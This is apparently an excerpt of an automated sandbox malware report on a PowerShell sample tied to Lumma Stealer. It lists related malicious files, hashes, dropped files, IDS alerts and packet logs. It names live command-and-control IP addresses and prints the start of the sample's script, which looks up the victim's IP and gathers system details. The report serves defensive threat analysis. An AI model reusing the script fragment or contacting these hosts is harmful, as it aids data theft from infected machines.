                                              Hilix.sh4.elfGet hashmaliciousMiraiBrowse
                                              • 185.216.200.208
                                              SSA-2025.exeGet hashmaliciousScreenConnect ToolBrowse
                                              • 193.26.115.242
                                              https://www.v1.bgmi-event.freewebhostmost.com/Get hashmaliciousUnknownBrowse
                                              • 66.78.59.15
                                              https://v1.bgmi-event.freewebhostmost.com/Get hashmaliciousUnknownBrowse
                                              • 66.78.59.15
                                              nabspc.elfGet hashmaliciousUnknownBrowse
                                              • 104.166.110.66
                                              G1B8T38x7G.elfGet hashmaliciousUnknownBrowse
                                              • 203.159.95.7
                                              test.exeGet hashmaliciousDiscord Token StealerBrowse
                                              • 167.88.173.11
                                              http://demfre.com/lact/nhuo/onaoPJocCsxs7r0YZwFMZ/c3VzYW4ua2FsY3JvZnRAc3RhdGUubmUuZ292Get hashmaliciousHTMLPhisherBrowse
                                              • 173.46.80.217
                                              CLOUDFLARENETUSCommercial Invoice Confirmation-1132346.vbsGet hashmaliciousUnknownBrowse
                                              • 104.21.16.1
                                              jjmax il.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 104.21.64.1
                                              Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 104.22.74.216
                                              Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 172.67.74.232
                                              Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 104.18.27.193
                                              FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeGet hashmaliciousDBatLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              • 104.21.32.1
                                              Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 104.18.27.193
                                              Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 172.67.23.234
                                              Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 104.18.66.57
                                              payment1.jsGet hashmaliciousFormBookBrowse
                                              • 104.21.16.1
                                              ARTNET2PL4Osfx7gnSx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              • 185.104.113.237
                                              fqJIOoSp5U.dllGet hashmaliciousUnknownBrowse
                                              • 91.206.178.125
                                              QZzvG5G6VE.exeGet hashmaliciousStealcBrowse
                                              • 91.206.178.118
                                              mrkjKujfkP.exeGet hashmaliciousStealcBrowse
                                              • 91.206.178.118
                                              vR19oQpY8c.exeGet hashmaliciousStealcBrowse
                                              • 91.206.178.118
                                              sql.tmp.dll.dllGet hashmaliciousUnknownBrowse
                                              • 91.206.178.125
                                              UrQrIdRfCg.exeGet hashmaliciousUnknownBrowse
                                              • 185.104.112.62
                                              http://tldbonak.comGet hashmaliciousUnknownBrowse
                                              • 91.206.178.97
                                              7ECHtNYRdu.exeGet hashmaliciousVidarBrowse
                                              • 185.104.114.24
                                              Wi50Ux1Ats.exeGet hashmaliciousVidarBrowse
                                              • 185.104.114.24

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              3b5074b1b5d032e5620f69f9f700ff0eCommercial Invoice Confirmation-1132346.vbsGet hashmaliciousUnknownBrowse
                                              • 185.211.7.193
                                              jjmax il.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 185.211.7.193
                                              Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 185.211.7.193
                                              Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 185.211.7.193
                                              Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 185.211.7.193
                                              FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeGet hashmaliciousDBatLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              • 185.211.7.193
                                              Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 185.211.7.193
                                              Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 185.211.7.193
                                              Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 185.211.7.193
                                              Rooming list.jsGet hashmaliciousRemcosBrowse
                                              • 185.211.7.193
                                              37f463bf4616ecd445d4a1937da06e19nDHL_CUSTOM_CLEARANCE_FORM_3409249_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                              • 104.18.11.207
                                              DHL AWB Document_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 104.18.11.207
                                              TxTPu961er.exeGet hashmaliciousAmadey, RedLine, StealcBrowse
                                              • 104.18.11.207
                                              Xw9oZv75Ze.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                              • 104.18.11.207
                                              hHtR1O06GH.exeGet hashmaliciousAmadey, Healer AV Disabler, LummaC Stealer, Stealc, VidarBrowse
                                              • 104.18.11.207
                                              #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f.exeGet hashmaliciousGhostRatBrowse
                                              • 104.18.11.207
                                              SecuriteInfo.com.Win32.Evo-gen.5457.19170.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                              • 104.18.11.207
                                              SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeGet hashmaliciousGuLoaderBrowse
                                              • 104.18.11.207
                                              SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeGet hashmaliciousGuLoaderBrowse
                                              • 104.18.11.207
                                              1638743478-734687553.8.exeGet hashmaliciousUnknownBrowse
                                              • 104.18.11.207

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2704
                                              Entropy (8bit):5.4203953118757235
                                              Encrypted:false
                                              SSDEEP:48:AcYNSU4y4RY5mFoUeW+mZ9tK8NTXGiR80xnqLQkyUbaImx10ln0z96JAwqgt:AZkHyIYgKLmZ2KTXGibBkyGaImM0h6JZ
                                              MD5:D1A53037AF541D0457C574C3811CA74B
                                              SHA1:8FD040C0759CBA56D49F79566D91056A893EC9BA
                                              SHA-256:E92668857F2E70EA1B041E3274C8207DBBA5051A7F17F6C298D4420EA432E1B4
                                              SHA-512:97C5F0188188CA5757B23FDF1AF071C6179D467056EB325091573E4906A633DEFC394435EC2AB98FFE4E5E41E75F961B93046F50FD3F9DEBDAD22EB1543456AB
                                              Malicious:false
                                              Reputation:low
                                              Preview:@...e................................................@..........X................$.....K.sG.<p..a.......Microsoft.Management.Infrastructure.CimCmdlets..H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............i..VdqF...|...........System.Configuration<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerS

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbtwnioc.hez.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ozfq3epv.yhl.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmk24kdu.ceo.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zwlocbvy.koc.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3MQH69403QZE4GKLQIHR.temp

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6225
                                              Entropy (8bit):3.7429548255148086
                                              Encrypted:false
                                              SSDEEP:96:4Vy+CCHrjkvhkvCCtVjS5LKHTmS5LKHT2:Cy+trlS5L3S5Lp
                                              MD5:1CC7C658CE35CAFAB3115B5A700B113E
                                              SHA1:B2E28ACDF83AA6B7E6D7D03C8775D55EF0743113
                                              SHA-256:75AF132431C69308527B7B84609B6C4F465BE2DAD4820961D07B404BF15A16B8
                                              SHA-512:35E1720551514DD6431AD1954A7C86F83251F4309F79AF672FBC4759C07F0B491B36F3B8772FF03EC5FE7EC298A9FED0129A5D4753F6541B4ED7B0FBA8562429
                                              Malicious:false
                                              Preview:...................................FL..................F.".. .....*_....(.._...z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_.....hU...^.?Y.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=RZ6;..........................3*N.A.p.p.D.a.t.a...B.V.1.....RZ9;..Roaming.@......EW.=RZ9;.......................... GU.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=RZ6;..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=RZ6;...........................O).W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=RZ6;....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=RZ6;....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=EW.=....9...........

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6225
                                              Entropy (8bit):3.7429548255148086
                                              Encrypted:false
                                              SSDEEP:96:4Vy+CCHrjkvhkvCCtVjS5LKHTmS5LKHT2:Cy+trlS5L3S5Lp
                                              MD5:1CC7C658CE35CAFAB3115B5A700B113E
                                              SHA1:B2E28ACDF83AA6B7E6D7D03C8775D55EF0743113
                                              SHA-256:75AF132431C69308527B7B84609B6C4F465BE2DAD4820961D07B404BF15A16B8
                                              SHA-512:35E1720551514DD6431AD1954A7C86F83251F4309F79AF672FBC4759C07F0B491B36F3B8772FF03EC5FE7EC298A9FED0129A5D4753F6541B4ED7B0FBA8562429
                                              Malicious:false
                                              Preview:...................................FL..................F.".. .....*_....(.._...z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_.....hU...^.?Y.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=RZ6;..........................3*N.A.p.p.D.a.t.a...B.V.1.....RZ9;..Roaming.@......EW.=RZ9;.......................... GU.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=RZ6;..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=RZ6;...........................O).W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=RZ6;....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=RZ6;....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=EW.=....9...........

                                              Static File Info

                                              General

                                              File type:ASCII text, with very long lines (703), with no line terminators
                                              Entropy (8bit):5.389695953286014
                                              TrID:
                                                File name:Pmw24ExIdx.ps1
                                                File size:703 bytes
                                                MD5:9d4b0d4215aba4d887790a8a959eb119
                                                SHA1:7a2607ff3d039b73a913381daf2df94c58e67a61
                                                SHA256:6b61934dea7d3b16f46b12dc810972a58e4278632ad39abdbf79801fca7a4875
                                                SHA512:f19a04b10064f2c5115428a8fbd12fc588a30c53d2d7c22bd906fb183e9db56ddcc45dafd39d58e0cd70f87a1bdcb1349daba639281e38686870de0e64d7f0b4
                                                SSDEEP:12:WVBuiG3wEQ2aHWj25ioWAR+wpbZ6l/6gLhYdGHAyG35+9zIy5hu1M4AGs6Y:BP3wEqHu25xxUlpLhNHAf3gH5htORY
                                                TLSH:7601C031733C428583D5C860B4B9B712D0576B40A55EEDFD76FC2001C7832E23D54918
                                                File Content Preview:$randomNumber=Get-Random -Minimum 10000 -Maximum 99999; $ipAddress=(Invoke-WebRequest -Uri 'http://api.ipify.org').Content; $osVersion=[System.Environment]::OSVersion.VersionString; $memory=[math]::round((Get-CimInstance -ClassName Win32_ComputerSystem).T

                                                File Icon

                                                Icon Hash:3270d6baae77db44

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2025-02-18T08:25:58.366209+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.749699104.26.12.20580TCP
                                                2025-02-18T08:26:00.782059+01002860232ETPRO MALWARE Observed Lumma Stealer CnC Checkin (GET)1192.168.2.74970091.206.178.1205001TCP
                                                2025-02-18T08:26:00.782059+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.74970091.206.178.1205001TCP
                                                2025-02-18T08:26:00.782066+01002860233ETPRO MALWARE Observed Lumma Stealer CnC Response (Script Start Confirmation)191.206.178.1205001192.168.2.749700TCP
                                                2025-02-18T08:26:01.893635+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.749701185.211.7.193443TCP
                                                2025-02-18T08:26:01.893635+01002021697ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious1192.168.2.749701185.211.7.193443TCP
                                                2025-02-18T08:26:03.061005+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.74970591.206.178.1205001TCP
                                                2025-02-18T08:26:03.061005+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.74970591.206.178.1205001TCP

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Feb 18, 2025 08:25:57.841998100 CET4969980192.168.2.7104.26.12.205
                                                Feb 18, 2025 08:25:57.848089933 CET8049699104.26.12.205192.168.2.7
                                                Feb 18, 2025 08:25:57.848176956 CET4969980192.168.2.7104.26.12.205
                                                Feb 18, 2025 08:25:57.849359989 CET4969980192.168.2.7104.26.12.205
                                                Feb 18, 2025 08:25:57.854161978 CET8049699104.26.12.205192.168.2.7
                                                Feb 18, 2025 08:25:58.322365046 CET8049699104.26.12.205192.168.2.7
                                                Feb 18, 2025 08:25:58.366209030 CET4969980192.168.2.7104.26.12.205
                                                Feb 18, 2025 08:25:59.616442919 CET497005001192.168.2.791.206.178.120
                                                Feb 18, 2025 08:25:59.621481895 CET50014970091.206.178.120192.168.2.7
                                                Feb 18, 2025 08:25:59.621572971 CET497005001192.168.2.791.206.178.120
                                                Feb 18, 2025 08:25:59.622049093 CET497005001192.168.2.791.206.178.120
                                                Feb 18, 2025 08:25:59.626944065 CET50014970091.206.178.120192.168.2.7
                                                Feb 18, 2025 08:26:00.772011995 CET50014970091.206.178.120192.168.2.7
                                                Feb 18, 2025 08:26:00.781971931 CET50014970091.206.178.120192.168.2.7
                                                Feb 18, 2025 08:26:00.782058954 CET497005001192.168.2.791.206.178.120
                                                Feb 18, 2025 08:26:00.782066107 CET50014970091.206.178.120192.168.2.7
                                                Feb 18, 2025 08:26:00.782155991 CET497005001192.168.2.791.206.178.120
                                                Feb 18, 2025 08:26:00.795588970 CET497005001192.168.2.791.206.178.120
                                                Feb 18, 2025 08:26:00.800442934 CET50014970091.206.178.120192.168.2.7
                                                Feb 18, 2025 08:26:00.844290972 CET49701443192.168.2.7185.211.7.193
                                                Feb 18, 2025 08:26:00.844342947 CET44349701185.211.7.193192.168.2.7
                                                Feb 18, 2025 08:26:00.844444990 CET49701443192.168.2.7185.211.7.193
                                                Feb 18, 2025 08:26:00.852996111 CET49701443192.168.2.7185.211.7.193
                                                Feb 18, 2025 08:26:00.853018045 CET44349701185.211.7.193192.168.2.7
                                                Feb 18, 2025 08:26:01.542763948 CET44349701185.211.7.193192.168.2.7
                                                Feb 18, 2025 08:26:01.542877913 CET49701443192.168.2.7185.211.7.193
                                                Feb 18, 2025 08:26:01.629965067 CET49701443192.168.2.7185.211.7.193
                                                Feb 18, 2025 08:26:01.630008936 CET44349701185.211.7.193192.168.2.7
                                                Feb 18, 2025 08:26:01.631030083 CET44349701185.211.7.193192.168.2.7
                                                Feb 18, 2025 08:26:01.678822994 CET49701443192.168.2.7185.211.7.193
                                                Feb 18, 2025 08:26:01.688014030 CET49701443192.168.2.7185.211.7.193
                                                Feb 18, 2025 08:26:01.735335112 CET44349701185.211.7.193192.168.2.7
                                                Feb 18, 2025 08:26:01.893752098 CET44349701185.211.7.193192.168.2.7
                                                Feb 18, 2025 08:26:01.893868923 CET44349701185.211.7.193192.168.2.7
                                                Feb 18, 2025 08:26:01.894263029 CET49701443192.168.2.7185.211.7.193
                                                Feb 18, 2025 08:26:01.894330978 CET44349701185.211.7.193192.168.2.7
                                                Feb 18, 2025 08:26:01.894687891 CET44349701185.211.7.193192.168.2.7
                                                Feb 18, 2025 08:26:01.894758940 CET49701443192.168.2.7185.211.7.193
                                                Feb 18, 2025 08:26:01.898689985 CET49701443192.168.2.7185.211.7.193
                                                Feb 18, 2025 08:26:02.035783052 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.035835981 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.035911083 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.037242889 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.037262917 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.361784935 CET497055001192.168.2.791.206.178.120
                                                Feb 18, 2025 08:26:02.366764069 CET50014970591.206.178.120192.168.2.7
                                                Feb 18, 2025 08:26:02.366858959 CET497055001192.168.2.791.206.178.120
                                                Feb 18, 2025 08:26:02.367400885 CET497055001192.168.2.791.206.178.120
                                                Feb 18, 2025 08:26:02.372248888 CET50014970591.206.178.120192.168.2.7
                                                Feb 18, 2025 08:26:02.501418114 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.501503944 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.510756016 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.510792017 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.511089087 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.511363029 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.512420893 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.559341908 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.640691042 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.640734911 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.640770912 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.640798092 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.640805006 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.640829086 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.640851021 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.640861988 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.640870094 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.640875101 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.640903950 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.640908003 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.640980005 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.641170979 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.641216040 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.645348072 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.645400047 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.645404100 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.645423889 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.645438910 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.645454884 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.645458937 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.645502090 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.727947950 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.728034973 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.728046894 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.728059053 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.728085041 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.728097916 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.728108883 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.728162050 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.728195906 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.728202105 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.728279114 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.728317022 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.728384972 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.728389978 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.728421926 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.728604078 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.728650093 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.728655100 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.728703022 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.728707075 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.728739977 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.728744984 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.728776932 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.729106903 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.729167938 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.729208946 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.729211092 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.729219913 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.729239941 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.729254961 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.729259014 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.729290962 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.729295015 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.729326010 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.729331017 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.729377985 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.730050087 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.730096102 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.730104923 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.730146885 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.730150938 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.730186939 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.772048950 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.772120953 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.772156000 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.772195101 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.815452099 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.815527916 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.815558910 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.815588951 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.815607071 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.815639019 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.815660000 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.815680981 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.816162109 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.816200018 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.816217899 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.816229105 CET44349702104.18.11.207192.168.2.7
